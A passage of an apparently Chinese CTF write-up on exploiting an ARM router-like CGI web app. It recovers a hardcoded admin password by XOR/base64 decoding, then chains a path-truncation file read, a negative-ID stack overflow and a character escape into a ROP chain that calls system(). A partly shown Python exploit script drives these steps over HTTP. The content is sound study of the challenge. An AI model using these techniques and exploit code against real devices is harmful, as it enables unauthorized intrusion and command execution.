class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><code class="hljs c">    <span class="hljs-built_in">memset</span>(input_enc_passwd, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(input_enc_passwd));<br>    passwd_len = <span class="hljs-built_in">strlen</span>(passwd);<br>    passwd_memory = <span class="hljs-built_in">malloc</span>(passwd_len);<br>    <span class="hljs-keyword">if</span> ( !passwd_memory )<br>      <span class="hljs-keyword">goto</span> LABEL_107;<br>    <span class="hljs-keyword">if</span> ( passwd_len &gt; <span class="hljs-number">0</span> )<br>    &#123;<br>      <span class="hljs-keyword">do</span><br>      &#123;<br>        passwd_memory[idx] = xor_key[idx % <span class="hljs-number">10</span>] ^ passwd[idx];<span class="hljs-comment">// xor</span><br>        ++idx;<br>      &#125;<br>      <span class="hljs-keyword">while</span> ( passwd_len != idx );<br>      idx = <span class="hljs-number">0</span>;<br>      input_enc_passwd_ = input_enc_passwd;<br>      idx_ = <span class="hljs-number">0</span>;<br>      <span class="hljs-keyword">while</span> ( <span class="hljs-number">1</span> )<br>      &#123;<br>        v70 = passwd_memory[idx_];<br>        <span class="hljs-keyword">if</span> ( passwd_len &gt; idx_ + <span class="hljs-number">1</span> )<br>        &#123;<br>          v57 = passwd_memory[idx_ + <span class="hljs-number">1</span>];<br>          <span class="hljs-keyword">if</span> ( passwd_len &lt;= idx_ + <span class="hljs-number">2</span> )<br>          &#123;<br>            LOBYTE(v58) = <span class="hljs-number">0</span>;<br>            v59 = (<span class="hljs-number">16</span> * (v70 &amp; <span class="hljs-number">3</span>)) | (v57 &gt;&gt; <span class="hljs-number">4</span>);<br>            idx_ += <span class="hljs-number">2</span>;<br>            v60 = v70 &gt;&gt; <span class="hljs-number">2</span>;<br>            v61 = <span class="hljs-number">4</span> * (v57 &amp; <span class="hljs-number">0xF</span>);<br>            v63 = <span class="hljs-number">0</span>;<br>            v62 = <span class="hljs-number">0</span>;<br>          &#125;<br>          <span class="hljs-keyword">else</span><br>          &#123;<br>            v58 = passwd_memory[idx_ + <span class="hljs-number">2</span>];<br>            v59 = (<span class="hljs-number">16</span> * (v70 &amp; <span class="hljs-number">3</span>)) | (v57 &gt;&gt; <span class="hljs-number">4</span>);<br>            idx_ += <span class="hljs-number">3</span>;<br>            v60 = v70 &gt;&gt; <span class="hljs-number">2</span>;<br>            v61 = <span class="hljs-number">4</span> * (v57 &amp; <span class="hljs-number">0xF</span>);<br>            v62 = v58 &gt;&gt; <span class="hljs-number">6</span>;<br>            v63 = <span class="hljs-number">1</span>;<br>          &#125;<br>          v64 = v62 | v61;<br>          <span class="hljs-keyword">if</span> ( v63 )<br>          &#123;<br>            v65 = v58 &amp; <span class="hljs-number">0x3F</span>;<br>            v66 = <span class="hljs-number">1</span>;<br>          &#125;<br>          <span class="hljs-keyword">else</span><br>          &#123;<br>            v66 = <span class="hljs-number">1</span>;<br>            v65 = <span class="hljs-number">0</span>;<br>          &#125;<br>        &#125;<br>        <span class="hljs-keyword">else</span><br>        &#123;<br>          v66 = <span class="hljs-number">0</span>;<br>          v71 = v70 &amp; <span class="hljs-number">3</span>;<br>          ++idx_;<br>          v60 = v70 &gt;&gt; <span class="hljs-number">2</span>;<br>          v59 = <span class="hljs-number">16</span> * v71;<br>          v64 = <span class="hljs-number">0</span>;<br>          v63 = <span class="hljs-number">0</span>;<br>          v65 = <span class="hljs-number">0</span>;<br>        &#125;<br>        <span class="hljs-keyword">if</span> ( idx == <span class="hljs-string">&#x27;\x03\xFC&#x27;</span> )<br>          <span class="hljs-keyword">break</span>;<br>        v67 = aAbcdefghijklmn[v59];<br>        input_enc_passwd[idx] = aAbcdefghijklmn[v60];<br>        input_enc_passwd_[<span class="hljs-number">1</span>] = v67;<br>        <span class="hljs-keyword">if</span> ( v66 )<br>          v68 = aAbcdefghijklmn[v64];<br>        <span class="hljs-keyword">else</span><br>          v68 = <span class="hljs-number">61</span>;<br>        input_enc_passwd_[<span class="hljs-number">2</span>] = v68;<br>        <span class="hljs-keyword">if</span> ( v63 )<br>          v69 = aAbcdefghijklmn[v65];<br>        <span class="hljs-keyword">else</span><br>          v69 = <span class="hljs-number">61</span>;<br>        input_enc_passwd_[<span class="hljs-number">3</span>] = v69;<br>        idx += <span class="hljs-number">4</span>;<br>        input_enc_passwd_ += <span class="hljs-number">4</span>;<br>        <span class="hljs-keyword">if</span> ( passwd_len &lt;= idx_ )<br>          <span class="hljs-keyword">goto</span> LABEL_94;<br>      &#125;<br>      <span class="hljs-built_in">free</span>(passwd_memory);<br>LABEL_107:<br>      output(<span class="hljs-string">&quot;Internal error.&quot;</span>);<br>      <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>    &#125;<br>LABEL_94:<br>    input_enc_passwd[idx] = <span class="hljs-number">0</span>;<br>    <span class="hljs-built_in">free</span>(passwd_memory);<br></code></pre></td></tr></table></figure>




<p>解密脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">xor_bytes</span>(<span class="hljs-params">data: <span class="hljs-built_in">bytes</span>, key: <span class="hljs-built_in">bytes</span></span>) -&gt; <span class="hljs-built_in">bytes</span>:<br>    k = <span class="hljs-built_in">len</span>(key)<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bytes</span>(b ^ key[i % k] <span class="hljs-keyword">for</span> i, b <span class="hljs-keyword">in</span> <span class="hljs-built_in">enumerate</span>(data))<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">decrypt_from_b64</span>(<span class="hljs-params">b64_str: <span class="hljs-built_in">str</span>, key: <span class="hljs-built_in">bytes</span></span>) -&gt; <span class="hljs-built_in">bytes</span>:<br>    enc = base64.b64decode(b64_str)<br>    <span class="hljs-keyword">return</span> xor_bytes(enc, key)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">encrypt_to_b64</span>(<span class="hljs-params">plain: <span class="hljs-built_in">bytes</span>, key: <span class="hljs-built_in">bytes</span></span>) -&gt; <span class="hljs-built_in">str</span>:<br>    enc = xor_bytes(plain, key)<br>    <span class="hljs-keyword">return</span> base64.b64encode(enc).decode()<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:<br>    target_str = <span class="hljs-string">&quot;dlZ4bWFsdjUDaiYCeCUqfGYUEhBvFW97dmtxcA==&quot;</span><br>    xor_key = <span class="hljs-string">b&quot;N1K_ROUT3R&quot;</span><br><br>    recovered = decrypt_from_b64(target_str, xor_key)<br>    <span class="hljs-comment"># 常见固件里会有结尾 0 字节，可按需去掉</span><br>    recovered_str = recovered.rstrip(<span class="hljs-string">b&quot;\x00&quot;</span>)<br><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;raw bytes:&quot;</span>, recovered)<br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;utf-8:&quot;</span>, recovered_str.decode(<span class="hljs-string">&quot;utf-8&quot;</span>))<br>    <span class="hljs-keyword">except</span> UnicodeDecodeError:<br>        <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>




<p>密码为admin&#x2F;8g323##a08h33zx33@!B!$$$$$$$</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">➜  binfile python3 decode_passwd.py<br>raw <span class="hljs-built_in">bytes</span>: <span class="hljs-string">b&#x27;8g323##a08h33zx33@!B!$$$$$$$&#x27;</span><br>utf-<span class="hljs-number">8</span>: 8g323<span class="hljs-comment">##a08h33zx33@!B!$$$$$$$</span><br></code></pre></td></tr></table></figure>




<h2 id="栈溢出"><a href="#栈溢出" class="headerlink" title="栈溢出"></a>栈溢出</h2><p>通过admin账号登陆后台后，可以去访问很多其他的功能</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_JLNwft65uG.png" srcset="/img/loading.gif" lazyload></p>
<p>这里我从manage.cgi开始分析，可以发现一些值得关注的地方，比如说这里创建了一个共享内存，接着会用一个bss段上的指针去指向这个共享内存</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_OSRrOKfwi2.png" srcset="/img/loading.gif" lazyload></p>
<p>这里人为传入的rk参数如果与&#x2F;tmp&#x2F;rootkey的内容一致，则会进入下方的函数逻辑，继续跟进</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_9LiluVxIt9.png" srcset="/img/loading.gif" lazyload></p>
<p>这里仔细看一下就发现tv.tv_usec &amp; 1的值无非0或1，所以一定会调用到sub_9FD0函数</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_op6Pl8ikty.png" srcset="/img/loading.gif" lazyload></p>
<p>sub_9FD0函数首先会把&#x2F;tmp&#x2F;store&#x2F;id.txt文件的id值读出来，也就是下方的v16。接着调用到shm_mem_dump，这里会根据传入的第三个参数来决定采用哪一种memcopy的模式，第一次调用是正常的memcpy调用，将共享内存的内容读到堆上。</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_s9VkYfy-cM.png" srcset="/img/loading.gif" lazyload></p>
<p>接着这里的(*(&amp;buf + (((unsigned __int8)v16 ^ 0x13) &amp; 1))，由于 &amp; 1操作的存在，因此还是会调用到shm_mem_dump函数，但是此时的v16其实int类型，所以这里如果传入一个负数，就会导致一个溢出，由于是拷贝到v19，而v19是一个栈上的值，所以会造成栈溢出</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_zPEJGgU0Hv.png" srcset="/img/loading.gif" lazyload></p>
<p>结合上方的分析，我们可以发现，我们这里的栈溢出是有前置条件的</p>
<ul>
<li>id要为负数</li>
<li>niksessid需要提前知道，这样才可以提前设置rk的值，然后进入rootkey_privileged_mode()函数</li>
</ul>
<p>所以接下来再分析的同时还需要解决这两个问题</p>
<h2 id="目录截断"><a href="#目录截断" class="headerlink" title="目录截断"></a>目录截断</h2><p>分析upload.cgi文件</p>
<p>当action为download的时候，可以设置path字段，然后下面存在一个snprintf函数，这里其实存在一个截断的问题，同时注意check_suffix(filepath, “nik.gif”)会检查文件的后缀是不是nik.gif，那么其实可以尝试去构造一个路径，类似于&#x2F;tmp&#x2F;.&#x2F;.&#x2F;.&#x2F;xxxxxrootkeynik.gif的形式，这样保证0x60截断了nik.gif，同时绕过后缀的检查，然后同时还可以访问到&#x2F;tmp&#x2F;rootkey文件，接着下面读取文件内容，同时满足文件大小是64b，然后会将内容输出</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_g6Bhs0-__i.png" srcset="/img/loading.gif" lazyload></p>
<p>但是这里存在一个问题就是&#x2F;tmp&#x2F;rootkey这个文件在默认状态下不存在，所以我们需要找到创建这个文件的逻辑</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">root@debian-armel:/var/www# <span class="hljs-built_in">ls</span> /tmp/<br>store<br><br></code></pre></td></tr></table></figure>




<p>可以通过grep -r查找，发现了watch中存在rootkey这个字符串</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">root@debian-armel:/var/www/cgi-bin# grep -r rootkey ./<br>Binary file ./watch matches<br>Binary file ./manage.cgi matches<br></code></pre></td></tr></table></figure>




<p>分析这个binary可以发现，这里会创建一个64b大小的文件，然后再重命名为&#x2F;tmp&#x2F;rootkey，最后输出Good luck</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_7BUyj9Vk8U.png" srcset="/img/loading.gif" lazyload></p>
<p>那么通过这样，我们可以创建&#x2F;tmp&#x2F;rootkey文件，同时通过目录截断读取这个文件的内容，也就是我们知道了niksessid，这样我们可以提前设置rk的值，绕过判断，触发漏洞逻辑</p>
<p>通过分析lang.cgi，我们可以通过设置setid字段设置id的值，然后这个值就会被保存到&#x2F;tmp&#x2F;store&#x2F;id.txt文件里</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_kOJJtEYWzH.png" srcset="/img/loading.gif" lazyload></p>
<p>那么至此为止，我们已经具备了触发栈溢出的能力了，那么现在的问题是如何写rop</p>
<h2 id="字符逃逸"><a href="#字符逃逸" class="headerlink" title="字符逃逸"></a>字符逃逸</h2><p>回头看栈溢出的位置，其实是拷贝共享内存的内容到栈上，那么现在就需要接着去看共享内存的值应该如何设置</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_RnNwnDgFSj.png" srcset="/img/loading.gif" lazyload></p>
<p>这里会根据我们传入的action来决定执行什么函数</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_dzeyX8pVLE.png" srcset="/img/loading.gif" lazyload></p>
<p>这是action_dispatch_table的内容</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_sb10cC2TxX.png" srcset="/img/loading.gif" lazyload></p>
<p>问题出现在setpkfunc中，这里会将&#x2F;tmp&#x2F;store&#x2F;publicfile.txt的内容读出来，仔细看会发现存在一个off-by-one</p>
<blockquote>
<p>但是其实根本没用</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_O6vYmf2il6.png" srcset="/img/loading.gif" lazyload></p>
<p>接着这里会有一个转化，就是转化为16进制的操作，同时仍然存在off-by-one</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_UorByWK-oI.png" srcset="/img/loading.gif" lazyload></p>
<p>接着的操作比较迷惑，一些奇怪的判断，然后需要注意的是当idx &#x3D;&#x3D; 80时，会直接执行final_data[81] &#x3D; chunk[80];然后退出循环，也就意味着chunk[80]不需要经过前面的字符检查，直接被赋值到final_data[81]</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_lWQqaF5x72.png" srcset="/img/loading.gif" lazyload></p>
<p>下面就可以通过设置cnt1和cnt2来将我们逃逸的字符写到共享内存上</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_j0Q1fNVbbp.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h2><p>由于这题没有pie和aslr，所以可以直接获取到gadget，同时处于稳定性考虑，我们可以直接把system需要执行的字符串写到共享内存上，这样更稳定，然后作为system的参数，这样就可以稳定的rce了</p>
<p>需要注意的是，我们需要将flag重定向到&#x2F;tmp&#x2F;store&#x2F;logs.txt，然后通过log的查看功能来看到flag</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_RXuMpC_2XK.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="exploit"><a href="#exploit" class="headerlink" title="exploit"></a>exploit</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> quote_plus<br><span class="hljs-keyword">import</span> re<br><span class="hljs-keyword">import</span> asyncio<br><br>mysession = <span class="hljs-literal">None</span><br>mysid = <span class="hljs-literal">None</span><br>base_url = <span class="hljs-string">&quot;http://127.0.0.1:8800&quot;</span><br><br>headers = &#123;<br>    <span class="hljs-string">&quot;Host&quot;</span>: <span class="hljs-string">&quot;127.0.0.1:8800&quot;</span>,<br>    <span class="hljs-string">&quot;sec-ch-ua&quot;</span>: <span class="hljs-string">&#x27;&quot;Chromium&quot;;v=&quot;140&quot;, &quot;Not=A?Brand&quot;;v=&quot;24&quot;, &quot;Microsoft Edge&quot;;v=&quot;140&quot;&#x27;</span>,<br>    <span class="hljs-string">&quot;sec-ch-ua-mobile&quot;</span>: <span class="hljs-string">&quot;?0&quot;</span>,<br>    <span class="hljs-string">&quot;sec-ch-ua-platform&quot;</span>: <span class="hljs-string">&#x27;&quot;macOS&quot;&#x27;</span>,<br>    <span class="hljs-string">&quot;Upgrade-Insecure-Requests&quot;</span>: <span class="hljs-string">&quot;1&quot;</span>,<br>    <span class="hljs-string">&quot;Origin&quot;</span>: <span class="hljs-string">&quot;http://127.0.0.1:8800&quot;</span>,<br>    <span class="hljs-string">&quot;Content-Type&quot;</span>: <span class="hljs-string">&quot;application/x-www-form-urlencoded&quot;</span>,<br>    <span class="hljs-string">&quot;User-Agent&quot;</span>: <span class="hljs-string">&quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0&quot;</span>,<br>    <span class="hljs-string">&quot;Accept&quot;</span>: <span class="hljs-string">&quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7&quot;</span>,<br>    <span class="hljs-string">&quot;Sec-Fetch-Site&quot;</span>: <span class="hljs-string">&quot;same-origin&quot;</span>,<br>    <span class="hljs-string">&quot;Sec-Fetch-Mode&quot;</span>: <span class="hljs-string">&quot;navigate&quot;</span>,<br>    <span class="hljs-string">&quot;Sec-Fetch-User&quot;</span>: <span class="hljs-string">&quot;?1&quot;</span>,<br>    <span class="hljs-string">&quot;Sec-Fetch-Dest&quot;</span>: <span class="hljs-string">&quot;document&quot;</span>,<br>    <span class="hljs-string">&quot;Referer&quot;</span>: <span class="hljs-string">&quot;http://127.0.0.1:8800/&quot;</span>,<br>    <span class="hljs-string">&quot;Accept-Encoding&quot;</span>: <span class="hljs-string">&quot;gzip, deflate&quot;</span>,<br>    <span class="hljs-string">&quot;Accept-Language&quot;</span>: <span class="hljs-string">&quot;zh-CN,zh;q=0.9&quot;</span>,<br>    <span class="hljs-string">&quot;Connection&quot;</span>: <span class="hljs-string">&quot;close&quot;</span><br>&#125;<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">set_session_cookies</span>():<br>    <span class="hljs-keyword">if</span> mysid:<br>        mysession.cookies.<span class="hljs-built_in">set</span>(<span class="hljs-string">&quot;SID&quot;</span>, mysid)<br>        mysession.cookies.<span class="hljs-built_in">set</span>(<br>            <span class="hljs-string">&quot;mitmproxy-auth&quot;</span>,<br>            <span class="hljs-string">&#x27;2|1:0|10:1745484849|14:mitmproxy-auth|4:eQ==|&#x27;</span><br>            <span class="hljs-string">&#x27;bcade3a9f1b37c48d9c3d670a0d91c2524f01452c91ba02f80c059c1a5c1b0a5&#x27;</span><br>        )<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[-] 未设置 SID&quot;</span>)<br>        exit(<span class="hljs-number">1</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">send_post</span>(<span class="hljs-params">url, data</span>):<br>    set_session_cookies()<br>    resp = mysession.post(base_url + url, headers=headers, data=data)<br>    <span class="hljs-keyword">return</span> resp.text<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">send_get</span>(<span class="hljs-params">url, params</span>):<br>    set_session_cookies()<br>    resp = mysession.get(base_url + url, headers=headers, params=params)<br>    <span class="hljs-keyword">return</span> resp.text<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">login</span>(<span class="hljs-params">username=<span class="hljs-string">&quot;admin&quot;</span>, password=<span class="hljs-string">&quot;8g323##a08h33zx33@!B!$$$$$$$&quot;</span></span>):<br>    <span class="hljs-keyword">global</span> mysession, mysid<br><br>    url = <span class="hljs-string">&quot;/cgi-bin/auth.cgi&quot;</span><br>    mysession = requests.Session()<br><br>    data = <span class="hljs-string">f&quot;username=<span class="hljs-subst">&#123;quote_plus(username)&#125;</span>&amp;password=<span class="hljs-subst">&#123;quote_plus(password)&#125;</span>&quot;</span><br>    resp = mysession.post(base_url + url, headers=headers, data=data, allow_redirects=<span class="hljs-literal">False</span>)<br><br>    mysid = mysession.cookies.get(<span class="hljs-string">&quot;SID&quot;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> mysid:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[-] 登录失败，未获取到 SID&quot;</span>)<br>        mysession = <span class="hljs-literal">None</span><br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;[+] 登录成功，SID = <span class="hljs-subst">&#123;mysid&#125;</span>&quot;</span>)<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">upload</span>(<span class="hljs-params">data</span>):<br>    <span class="hljs-keyword">return</span> send_post(<span class="hljs-string">&quot;/cgi-bin/upload.cgi&quot;</span>, data)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">manage</span>(<span class="hljs-params">params</span>):<br>    <span class="hljs-keyword">return</span> send_get(<span class="hljs-string">&quot;/cgi-bin/manage.cgi&quot;</span>, params)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">create_rootkey</span>():<br>    <span class="hljs-keyword">return</span> send_get(<span class="hljs-string">&quot;/cgi-bin/watch&quot;</span>, &#123;&#125;)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">set_id</span>(<span class="hljs-params">params</span>):<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[+] setid saved: &quot;</span> + <span class="hljs-built_in">str</span>(params[<span class="hljs-string">&quot;setid&quot;</span>]))<br>    <span class="hljs-keyword">return</span> send_get(<span class="hljs-string">&quot;/cgi-bin/lang.cgi&quot;</span>, params)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">make_rop</span>():<br><span class="hljs-comment"># &#x27;&#x27;&#x27;</span><br><span class="hljs-comment"># 0x00015b24: pop &#123;lr&#125;; bx lr; </span><br><span class="hljs-comment"># 0x0010c730: pop &#123;r0, lr&#125;; bx lr; </span><br><span class="hljs-comment"># &#x27;&#x27;&#x27;</span><br>    libc = <span class="hljs-number">0xb6e8f000</span><br>    pop_lr = <span class="hljs-number">0x00015b24</span> + libc<br>    pop_r0_lr = <span class="hljs-number">0x0010c730</span> + libc<br>    system = <span class="hljs-number">0x38d34</span> + libc<br>    shm_addr = <span class="hljs-number">0xb6ffc000</span><br>    args_addr = shm_addr + <span class="hljs-number">0x24</span> + <span class="hljs-number">0x4</span> * (<span class="hljs-number">3</span> + <span class="hljs-number">1</span>)<br>    cmd = <span class="hljs-string">&quot;cat /home/ctf/flag &gt; /tmp/store/logs.txt&quot;</span><br><br>    rop = <span class="hljs-string">b&#x27;a&#x27;</span> * <span class="hljs-number">0x24</span> + p32(pop_lr)<br>    rop += p32(pop_r0_lr) + p32(args_addr) + p32(system)<br>    rop += cmd<br>    rop += <span class="hljs-string">b&#x27;\x00&#x27;</span><br><br>    pk_prefix = <span class="hljs-string">&quot;00&quot;</span> * <span class="hljs-number">80</span><br><br>    <span class="hljs-keyword">for</span> idx, val <span class="hljs-keyword">in</span> <span class="hljs-built_in">enumerate</span>(rop):<br>        byte_hex = <span class="hljs-string">f&quot;<span class="hljs-subst">&#123;val:02x&#125;</span>&quot;</span> <br>        pk_content = pk_prefix + byte_hex * <span class="hljs-number">2</span><br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;[+] set payload_store[<span class="hljs-subst">&#123;idx&#125;</span>] = 0x<span class="hljs-subst">&#123;byte_hex&#125;</span>&quot;</span>)<br>        payload = &#123;<br>            <span class="hljs-string">&quot;action&quot;</span>: <span class="hljs-string">&quot;upload_pubkey&quot;</span>,<br>            <span class="hljs-string">&quot;filecontent&quot;</span>: pk_content,<br>        &#125;<br>        upload(payload)<br><br>        params = &#123;<br>            <span class="hljs-string">&quot;action&quot;</span>: <span class="hljs-string">&quot;set_publicfile&quot;</span>,<br>            <span class="hljs-string">&quot;cnt1&quot;</span>: <span class="hljs-number">80</span>,<br>            <span class="hljs-string">&quot;cnt2&quot;</span>: idx,<br>        &#125;<br>        manage(params)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">redirect_flag_to_log</span>():<br>    create_rootkey()<br>    suffix = <span class="hljs-string">&quot;nik.gif&quot;</span><br>    need_to_minus = <span class="hljs-built_in">len</span>(<span class="hljs-string">&quot;/tmp/&quot;</span>+<span class="hljs-string">&quot;rootkey&quot;</span>) + <span class="hljs-number">1</span><br>    file_path = <span class="hljs-string">&quot;./&quot;</span> * ((<span class="hljs-number">0x60</span>-need_to_minus)//<span class="hljs-number">2</span>) + <span class="hljs-string">&quot;/&quot;</span> + <span class="hljs-string">&quot;rootkey&quot;</span> + suffix<br><br>    <span class="hljs-comment"># print(hex((need_to_minus)))</span><br>    <span class="hljs-comment"># 